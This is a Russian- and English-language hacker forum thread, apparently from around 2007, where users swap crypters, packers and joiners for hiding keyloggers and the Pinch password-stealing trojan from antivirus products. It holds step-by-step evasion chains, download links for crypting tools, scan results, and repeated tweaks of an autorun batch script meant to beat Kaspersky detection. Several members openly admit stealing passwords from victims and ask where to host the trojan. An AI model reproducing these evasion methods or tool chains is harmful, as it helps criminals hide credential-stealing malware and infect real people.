Hey guys, sorry for posting in English, but my keyboard is being repaired ( i dropped it on the ground ), but i am Russian and so you can answer on Russian.

So my question regards about crypting your keylogger.
What would be the most newest crypter, which hides my keylogger
( not made with pinch, i prefer ardamax keylogger ), from antiviruses?

Any hints on how to minimize the possibility of being caught by antivirus?

Thanks,
-Nikize

Hey guys, sorry for posting in English, but my keyboard is being repaired ( i dropped it on the ground ), but i am Russian and so you can answer on Russian.

So my question regards about crypting your keylogger.
What would be the most newest crypter, which hides my keylogger
( not made with pinch, i prefer ardamax keylogger ), from antiviruses?

Any hints on how to minimize the possibility of being caught by antivirus?

Thanks,
-Nikize

Use RPolyCrypt From vaska or
use many public combinations from undetect your file.

RPolyCrypt от васьки последний приватный уже палица всем :(

Hmm, well then, many of us would be grateful if someone provided a way to hide trojan/keylogger from Antiviruses.

zl0y
I understand russian completely, so you can answer me on russian :D

-Nikize

А ну тогда используй комбинации паблик крипторов,чтобы получить файл который не будет определяться антивирусами,например RPolyCrypt+какой нибудь пакер малоизвестный.

Aгa, you mean first i have to use some kind of crypter ( one from the previous posts ), and then pack it with some tool?

Thanks for helping, i appreciate this really much!

-Nikize

If someone knows great combinations of crypting/packing, could give me a hint, because im not experienced as you are guys.


edit:
I found this, and i recommend this to everyone, because this works ( at least mine did ).
Only thing to add there is that you should download software passports full/crack it.

Makes keyloggers undetectable.

http://www.w4ck1ng.com/board/showthread.php/make-all-trojan-virus-2703.html
( english guide )

-Nikize

Isis перезалей на dump или slil

Как можно криптануть ProRat???

Крипторами которые вылаживают тут не криптанеш исчи приват.

Крипторами которые вылаживают тут не криптанеш исчи приват.
У ProRat'а ddl'ки паляцца =\

У ProRat'а ddl'ки паляцца =\

Да поэтому нужно либо реверсить сам бинарный файл троя и эти dll извлекать, чистить и потом снова соберать, либо юзать приватные трои :)

Кто юзал серию RCryptor - как она работает ли под Windows Vista ???

GlOFF да работает (по крайней мере бот криптованый рполикриптом)

rosgot Понятно, а RCyptor, те что в паблике?

GlOFF rcripтor понятия не имею юзал рполикрипт покупа у васька (ток терь он умолк =\)

За все время, пока у меня стояла Виста (до сих пор), у меня отказался запуститься только 1 криптор - Grinch. Все остальные работали норм...

-=[AL!EN]=- Проверь RCryptor V1.5-1.6. можешь ?

GlOFF у меня тока 2.0. Пашет. Думаю и предыдуие запахают. 99.99%

Простой кодировщик файлов
старый но спрятал пинч
http://helper10.narod.ru/coder.rar

LEE_ROY Да точно, Этот парень что продавал Fly Cryptor - очень сильно проступился с политикой продаж, т.е. продавал сурсы вместе с криптором - я теперь вижу постоянные переделки его :)

Mo4x,прятать,то он прячет,вот только криптованный файл не работает.

Free Cryptor - бесплатная версия программы, обладает минимальной функциональностью программ из ряда "Крипторов". Данный софт используется для криптования\шифрования разного рода файлов, для усложнения их анализа, другими словами для защиты данных. Наш продукт является хорошим подспорьем тем, кто не привык за что-либо платить. Обладает следующими техническими характеристиками:

[+] Криптор написан на чистом WinAPI (Язык VС++).
[+] Привеска к криптуемому файлу минимальна (Размер стаба 256-1024 байт).
[+] Случайный ключ шифрования данных и кода.
[+] Криптор не меняет оригинальную точку входа в файл (OEP).
[+] Возможность сохранения резервной копии криптуемого файла.
[+] Возможность изменения имени добавляемой секции.
[+] Возможность установки случайного имени добавляемой секции.
[+] АБСОЛЮТНАЯ БЕСПЛАТНОСТЬ + БЕСПЛАТНЫЕ ОБНОВЛЕНИЯ!!!
Скрин:
http://www.soft.glofff.com/img/screen/freecryptor1.png
Download: Free Cryptor (http://www.soft.glofff.com/downloads/fc.rar)
Official site: http://soft.glofff.com (http://www.soft.glofff.com)

P.S. Данная программа носит чисто ознакомительный характер и используется исключительно для защиты Ваших данных, и не каким образом не должна быть использована в других целях, противоречащих законам какой либо страны!!!

Замечательная вешь, минимум функций =)
От каспера и нода прячет, криптует пакованные файлы.

2 GlOFF:Криптор прячет пинча от KIS 7.0.0.125, но пинч 3 от vaska (smtp) после криптовки не работает((
Выдаёт Ошибку приложения (0xc0000005)...

Замечательная вешь, минимум функций =)
От каспера и нода прячет, криптует пакованные файлы.
покачто....
Из паблика оч быстро в базы поподет

покачто....
Из паблика оч быстро в базы поподет
Ну это же паблик =)
Будем ждать приватку, надеюсь что это будет один из лучших

y']2 GlOFF:Криптор прячет пинча от KIS 7.0.0.125, но пинч 3 от vaska (smtp) после криптовки не работает((
Выдаёт Ошибку приложения (0xc0000005)...
Сам себе и отвечу,мошт кому пригодицо...
Короче,проблема решается так:
Берём пинч (я брал от vaska с отправкой через smtp).Встроенную криптовку XOR в билдере я не отключал!
Далее сжимаем это дело NSPack 3.0 (я сжимал с режимом макс.совместимости).
Далее берём Free Crypter by GlOFF и обязательно отключаем опцию "Не менять ОЕР"(ниже скажу почему).
Далее берём Free Joiner build 031 и клеим пинч с какой-нить *.exe флэшкой))И вуаля....))А отключать опцию "Не менять ОЕР" в криптере нужно для того,чтобы склеяный файл не палился эвристикой анти-зверя (у мну KIS 7).
псы:Сам по-себе криптованный трой не палится,джойнер тоже(если клеить безобидные файлы).

ппсы:Т.ч. Free Cryptor и Free Joiner by GlOFF отличные штуки! Автроу "+" в репу...

Free Cryptor

взял пинча 3, криптанул - каспер палит...
хз короче пойду еще попробую...

Значит уже добавили в базы(

Ну бл...зла не хватает....
Когда пост писал мой Kis 7 с самыми свежими базами не палил!А ща проверил файлик,который 1 час назад рассылал народу из контакт-листа аськи,и уже палица...Оперативно работают анти-зверь-одмины...

x_t@z[z]y И что пишут эти звери? Как определяют криптованные файлы???

они среди нас, они везде, кто следующий?
p.s про работников ав компаний.

они среди нас, они везде, кто следующий?
p.s про работников ав компаний.
никому нельзя верить каждый может быть мусором или из ав компании.
ЗЫ у меня параноя =\

x_t@z[z]y И что пишут эти звери? Как определяют криптованные файлы???
Дико извеняюсь!)Меня ввёл в заблуждение пост Zedo83.Криптую пинча - всё ок!Это джойнер уже спалился((
Каспер определяет два склееных *.txt файла как Trojan-PSW.Win32.LdPinch.dpm)Хотя пинчем там и не пахнет...
Видать этим джойнером народ только пинча и клеил.Вот они его сигнатуры и вбили как пинчевские))
А криптер пока актуален...

y']
А криптер пока актуален...
палит каспер

16.10.2007 21:31:32 Файл: D:\__.exe упакованный файл FreeCryptor

Теперь палит((
Когда пост писал специально сбилдерил пинча, оставлял встроенную криптовку Xor + отключал опцию "Не менять ОЕР".И каспер не палил!!!

создаю пинч v 3 by Vaska, криптую freeCryptor by GLOff v 0.1b (убираю галочку не менять EOP) - пишет закриптовался удачно, запускаю пишет ошибку: Порядковый номер не найден
Порядковый номер 33791 не найден в библиотеке DLL kernel32.dll?

Криптую заново с галочкой не менять EOP запускаю пишет ошибку: Pinch.exe config.nt Системный файл не предназначен для выполнения MS - Dos и Microsoft Windows. Для завершения приложения нажмите кнопку закрыть

создаю пинч v 3 by Vaska, криптую freeCryptor by GLOff v 0.1b (убираю галочку не менять EOP) - пишет закриптовался удачно, запускаю пишет ошибку: Порядковый номер не найден
Порядковый номер 33791 не найден в библиотеке DLL kernel32.dll?

Криптую заново с галочкой не менять EOP запускаю пишет ошибку: Pinch.exe config.nt Системный файл не предназначен для выполнения MS - Dos и Microsoft Windows. Для завершения приложения нажмите кнопку закрыть
Это проблема кривых рук создателя пинча,там импорт расположен неверно...

Free Cryptor™ version 0.2 beta build 001 ;)

http://www.soft.glofff.com/img/screen/freecryptor1.png

Почищенный и обнавленный.

Download: Free Cryptor (http://www.soft.glofff.com/downloads/fc.rar) [132!]
Official web site: http://soft.glofff.com (http://www.soft.glofff.com)

P.S. Данная программа носит чисто ознакомительный характер и используется исключительно для защиты Ваших данных, и не каким образом не должна быть использована в других целях, противоречащих законам какой либо страны!!!

Gloff скачал по ссылке но там версия старая 0.1 beta и Касперский его палит зараза!

x8m6 Попробуй обновить, может браузер тупит из хеша тебе архив выдает...

Конечно все это хорошо, но если мне надо закомпилировать не *.exe файл а допустим bat или vbs. Что мне тогда использовать?

Конечно все это хорошо, но если мне надо закомпилировать не *.exe файл а допустим bat или vbs. Что мне тогда использовать?

если нужно это, то это проще не придумаешь.. Пару энтеров или мусорные вставки, или переменные переименую... В общем нужно хоть немного разбираться :D

т.е. если вставить кучу энтеров можно уменьшить шанс обнаружения?

приведи плиз пример

onikishov Так ты выложи свой bat файлик и модифицируем в качестве примера :)

Вот
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
exit
: open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
if exist .\autorun.bin type .\autorun.bin >C:\autorun.txt&&exit
if exist %SYSTEMROOT%\system32\autorun.bin type %SYSTEMROOT%\system32\autorun.bin >c:\autorun.txt&&exit
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
:end

есть еще паблик криптер который каспер не успел запалить ?
тут можно ложить под хайдом ?

Спасибо за FreeCryptor, когда я использовал его с Neolite, он стал почти незримым, также для Kaspersky:

Kaspersky 7.0.0.125 2007.10.23 -

Эти обнаружили его:

Ikarus T3.1.1.12 2007.10.23 Backdoor.Win32.Ciadoor.ar
Panda 9.0.0.4 2007.10.23 Suspicious file
Sunbelt 2.2.907.0 2007.10.20 VIPRE.Suspicious

Опрятно!

-Nikize

Free Cryptor™ version 0.2 beta build 002 ;)

http://www.soft.glofff.com/img/screen/freecryptor1.png

Почищеный и модифицированный.

Download: Free Cryptor (http://www.soft.glofff.com/downloads/fc.rar) [1q2w3e=]
Official web site: http://soft.glofff.com (http://www.soft.glofff.com)

P.S. Данная программа носит чисто ознакомительный характер и используется исключительно для защиты Ваших данных, и не каким образом не должна быть использована в других целях, противоречащих законам какой либо страны!!!

Спасибо за эту программу!
Oдин из самых лучшых!

GlOFF, ну что? Где обещанный пример?
Кстати закриптовал один SFX архив криптором и проверил в инете, вместо 12% стал 80% че за фигня?

GlOFF, ну что? Где обещанный пример?
Кстати закриптовал один SFX архив криптором и проверил в инете, вместо 12% стал 80% че за фигня?

Это че такое? Я тебе чем-то обязан? Учись нормально общаться и думать сам ;)


if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
exit
: open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
if exist .\autorun.bin type .\autorun.bin >C:\autorun.txt&&exit
if exist %SYSTEMROOT%\system32\autorun.bin type %SYSTEMROOT%\system32\autorun.bin >c:\autorun.txt&&exit
exit
:next2
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
:end


1) Добавлен пробел в строку между "...WScript.exe и %SYSTEMROOT%\syste..."
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
2) Местами строчки поменял
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
if "%1"=="-" attrib -s -a -h -r %2\autorun.*

Помогите спрятать трой (В данном случае Pinch3)
Сколько не пробовал крипторов,всегда Касперский и Доктор Веб его палит.
Может что посоветуете ?

Spac0om Попробуй FreeCryptor. Перелистни страницу назад ;)

Есть ли у когонибудь статья о ручной криптовке?
Работающей на сегодняшний день...

Если получится, то замучу видео мануал

Spac0om Попробуй FreeCryptor. Перелистни страницу назад
Да пробовал я его.Палиться он Каспером и Др.Вебом :(

Free Cryptor™ version 0.2 beta build 002 ;)

http://www.soft.glofff.com/img/screen/freecryptor1.png

Почищеный и модифицированный.

Download: Free Cryptor (http://www.soft.glofff.com/downloads/fc.rar) [1q2w3e=]
Official web site: http://soft.glofff.com (http://www.soft.glofff.com)

P.S. Данная программа носит чисто ознакомительный характер и используется исключительно для защиты Ваших данных, и не каким образом не должна быть использована в других целях, противоречащих законам какой либо страны!!!

The application or DLL C:\Docume~1\MYNAME\Locals~1\temp\@3A.tmp is not a valid Windows image. Please check this against your installation diskette.

Failed to launch.


Whats the freaking problem?
This problem didn't appear in one update earlier?

ок, хорошо испрвим!!

oh, okey, we will be waiting for it!
Thanks,
-Nikize

После криптовки пинча 3, отчеты не доходят :\
Это от чего может быть?

GlOFF, ты че прикалываешься?
1.Ты сам пообещал, я тебя ж за язык не тянул.
2.То что ты там доработал - полный бред, ты уж извини. Я стоко пробелов ставил, но эффект не особенный.
3.Ты не ответил на вопрос:"Почему твой криптор наоборот усугубляет ситуацию?"

[QUOTE=onikishov]GlOFF, ты че прикалываешься?
1.Ты сам пообещал, я тебя ж за язык не тянул.
2.То что ты там доработал - полный бред, ты уж извини. Я стоко пробелов ставил, но эффект не особенный.
3.Ты не ответил на вопрос:"Почему твой криптор наоборот усугубляет ситуацию?"





КУДА БОЧКУ КАТИШЬ!? ОТЛИЧНЫЙ КРИПТЕР! Пабличный...и то тока 2-мя антивирами палится левыми! И не чё он не усугубляет.
P.S. Лично у меня всё пашет.

КУДА БОЧКУ КАТИШЬ!? ОТЛИЧНЫЙ КРИПТЕР! Пабличный...и то тока 2-мя антивирами палится левыми! И не чё он не усугубляет.
P.S. Лично у меня всё пашет.
Ты просто закриптовал через *FreeCryptor* И всё ?
У меня что то очень много антивирей палит после криптования этим криптором.

[QUOTE=Spac0om]Ты просто закриптовал через *FreeCryptor* И всё ?



Да, тока одним фриджойнером, и на virusscane проверил, трой прекрассно работает, а антивыри молчат.
1.Может у тебя верся криптора другая стоит? у меня v02b.
2.Ты где проверяешь троя? возможно ты сначала склеил а затем криптанул - в таком случае если твой троян был склеен джойнером который добавляет троя в автозагрузку, или куда-нибудь ещё, а трой же был склеен сначала, а потом криптонут и выходит что в распаковывается голый трой...

P.S. Хотя может я не совсем прав, но когда проверял была вот такая лажа.

Забыл сказать... Может ты галочки в крипторе не везде ставил?

Небольшой релиз от меня :)
Super Crypt 1.0
Весит всего 6 kb,а надо больше??
Алгоритм криптовки sub/add.
http://dump.ru/files/n/n984945414/
От касперского,нода,дрвеба,ав� �ста - пинча 3 скрывает.
Вобще криптор делался как пример для новичков,так что возможно скоро увидите исходники.

потестим :)

[QUOTE=zl0y]Небольшой релиз от меня :)
Super Crypt 1.0
Весит всего 6 kb,а надо больше??
Алгоритм криптовки sub/add.
http://dump.ru/files/n/n984945414/
От касперского,нода,дрвеба,ав� �ста - пинча 3 скрывает.
Вобще криптор делался как пример для новичков,так что возможно скоро увидите исходники.


Мля...пинч криптуется твоей прогой...но при запуске пинча ошибка вылетает=(

[QUOTE=zl0y]Небольшой релиз от меня :)
Super Crypt 1.0
Весит всего 6 kb,а надо больше??
Алгоритм криптовки sub/add.
http://dump.ru/files/n/n984945414/
От касперского,нода,дрвеба,ав� �ста - пинча 3 скрывает.
Вобще криптор делался как пример для новичков,так что возможно скоро увидите исходники.


Мля...пинч криптуется твоей прогой...но при запуске пинча ошибка вылетает=(
2.99 если то так и должно быть.
3.0 gate версию пробывал норм.
У тебя какая ?

[QUOTE=zl0y][QUOTE=alexman90]
2.99 если то так и должно быть.
3.0 gate версию пробывал норм.
У тебя какая


я тестил на smtp... раньше smtp меня в полне устраивала...а щас надоело уже, спалился онкретно... Сёдня зарегался на холме.ру гейт засунул, всё по инструкции делал, а он зараза не пашит... ну эту тему щас обсуждаю в топике - Xinch/Pinch

[QUOTE=zl0y][QUOTE=alexman90]
2.99 если то так и должно быть.
3.0 gate версию пробывал норм.
У тебя какая


я тестил на smtp... раньше smtp меня в полне устраивала...а щас надоело уже, спалился онкретно... Сёдня зарегался на холме.ру гейт засунул, всё по инструкции делал, а он зараза не пашит... ну эту тему щас обсуждаю в топике - Xinch/Pinch
все по идее должно работать :) пинча пакуешь?

zl0y
все по идее должно работать :) пинча пакуешь?[/QUOTE]


Ага. щас пользуюсь фри криптором. ВЕЩЬ убойная. пабличная версия, а тока 2 антивира левых палят=)

КУДА БОЧКУ КАТИШЬ!? ОТЛИЧНЫЙ КРИПТЕР! Пабличный...и то тока 2-мя антивирами палится левыми! И не чё он не усугубляет.
P.S. Лично у меня всё пашет.
В инете проверь!
Ты просто закриптовал через *FreeCryptor* И всё ?
У меня что то очень много антивирей палит после криптования этим криптором.
во-во почти все.

Scan taken on 26 Oct 2007 00:16:18 (GMT)
A-Squared Found nothing
AntiVir Found TR/Crypt.XPACK.Gen
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
CPsecure Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
F-Secure Anti-Virus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
Panda Antivirus Found nothing
Rising Antivirus Found nothing
Sophos Antivirus Found Mal/Basine-C
VirusBuster Found nothing
VBA32 Found nothing

alexman90,
http://forum.antichat.ru/thread14509.html ты здесь проверял?
странно при криптовки обычного SFX архива у меня на этой проверке около 80%

onikishov
http://forum.antichat.ru/thread14509.html ты здесь проверял?
странно при криптовки обычного SFX архива у меня на этой проверке около 80%


я проверял на вирусскане, результат видишь... у меня щас другая проблемма... обсуждю на http://forum.antichat.ru/showthread.php?p=490939&posted=1#post490939

alexman90,Я сначало склеиваю а потом крипткю.Галочки в крипторе пробовал по разному.Очень много антивирей у меня его палит.В том числе Каспер и Доктор веб.

После криптовки Free Cryptor и криптором от zl0y :
Пинчь не работает.Пишет что он не являеться приложением Винды.

После криптовки Free Cryptor и криптором от zl0y :
Пинчь не работает.Пишет что он не являеться приложением Винды.


Я не пойму! как вы юзаите их? какой пинч криптуешь? лично я 3-й криптую - у меня 2 антивира палят, а щас сделал джойнера после криптовки, так ваще 1 антивир левый палит!!! ЭТО ВАЩЕ ВЕЩЬ!!! и все после криптовки и склейки работает на ура! так что не знаю что за версия у тя фрикриптера и фриджойнера. А может из-за фаервола не пашит?

P.S. попробуй криптануть фриджойнером, а потом склеить фрикриптером...я так делаю...так как джойнер не оч палится

pinch3 Builder v1.2 By Vaska

Spac0om pinch3 Builder v1.2 By Vaska


у меня такой же! и всё хорошо....хочишь троя пришлю? убидишся в надёжности криптовки фрикриптера=)) ну а если серьёзно...мне кажится что у тебя версия фрикриптера другая... скачивай с оффсайта новую... и не вздумай фрикриптер с каким нить другим мишать....работать врят ли будет!

Скачал я последнюю версию Криптора и джойнера.
Всё равно - палит Касперский и Доктор веб :(

[QUOTE=Spac0om]Скачал я последнюю версию Криптора и джойнера.
Всё равно - палит Касперский и Доктор веб :(



я надеюсь что не на вирустотале проверял? хреново буит...через пару тройку дней уже все антивир.компании о существовании знать будут....на вирусскане - не так... я понятния не имею, почему у тебя палят...тока что с помощи соц.инженерии и пинча добыл пасы....а там стоял Др.Веб (я его в процессах увидел) единственное что не получается расшифровать пас от кипа.... эта темка щас на http://forum.antichat.ru/showthread.php?p=491331&posted=1#post491331 посмотри...если можешь расшифруй прил

Говорят что на вирустотале только Лаборатории касперского отчёты идут.
Я проверяю на антивирях.На трёх.Друзьям даю чтоб онипроверили.

Всё,всё пучилось.
С помощью СИ и Пинча уже много натырил нужной инфы.
Теперь осталось научиться пинчьзаливать на веб-страницу
Дайте ссылку на Вирусскан.

Говорят что на вирустотале только Лаборатории касперского отчёты идут.
Я проверяю на антивирях.На трёх.Друзьям даю чтоб онипроверили.


Интересно, как это ты проверяешь?

Всё,всё пучилось.
С помощью СИ и Пинча уже много натырил нужной инфы.
Теперь осталось научиться пинчьзаливать на веб-страницу :(
Дайте ссылку на Вирусскан.



лови! _http://virusscan.jotti.org/

Spac0om Пинча заливай на таких хостингах как http://fileland.ru/ или http://ifolder.ru/ , там зарегся сначала, а потом заливай=) и ваще про пинч/ксинч в другом топике! - http://forum.antichat.ru/showthread.php?p=491370&posted=1#post491370

З.Ы. извините за оффтоп!

GlOFF, ну что? Где обещанный пример?


Старый пример был актуален, ребята с avp не спят, вот тебе новый ;)


@set SysRoot = %SYSTEMROOT%
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
if exist %SysRoot%\system32\autorun.vbs start WScript.exe %SysRoot%\system32\autorun.vbs&exit
exit
: open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
if exist .\autorun.bin type .\autorun.bin >C:\autorun.txt&&exit
if exist %SysRoot%\system32\autorun.bin type %SysRoot%\system32\autorun.bin >c:\autorun.txt&&exit
exit
:next2
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
:end


1) Добавлена новая переменная SysRoot = %SYSTEMROOT%
2) Местами строчки поменял
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
if "%1"=="-" attrib -s -a -h -r %2\autorun.*

KAV7 - не палит!!!

GlOFFКстати закриптовал один SFX архив криптором и проверил в инете, вместо 12% стал 80% че за фигня?


Криптор спалился :D Паблик не вечен. Следи за обновлениями...

When the working release will come out, it practically hides the virus from all AV's.
Please fix it soon >:

-Nikize

nikize Да я могбы это зделать, но появились барыги, которые сменили дизайн криптора и начали продавать. Подробнее Здесь (https://forum.zloy.org/showthread.php?t=41984)

GlOFF, приятель, большое тебе спасибо!
насчет криптора: если люди не следят за обновлениями антивирей, то есть возможность, что его не попалят, правильно я понял?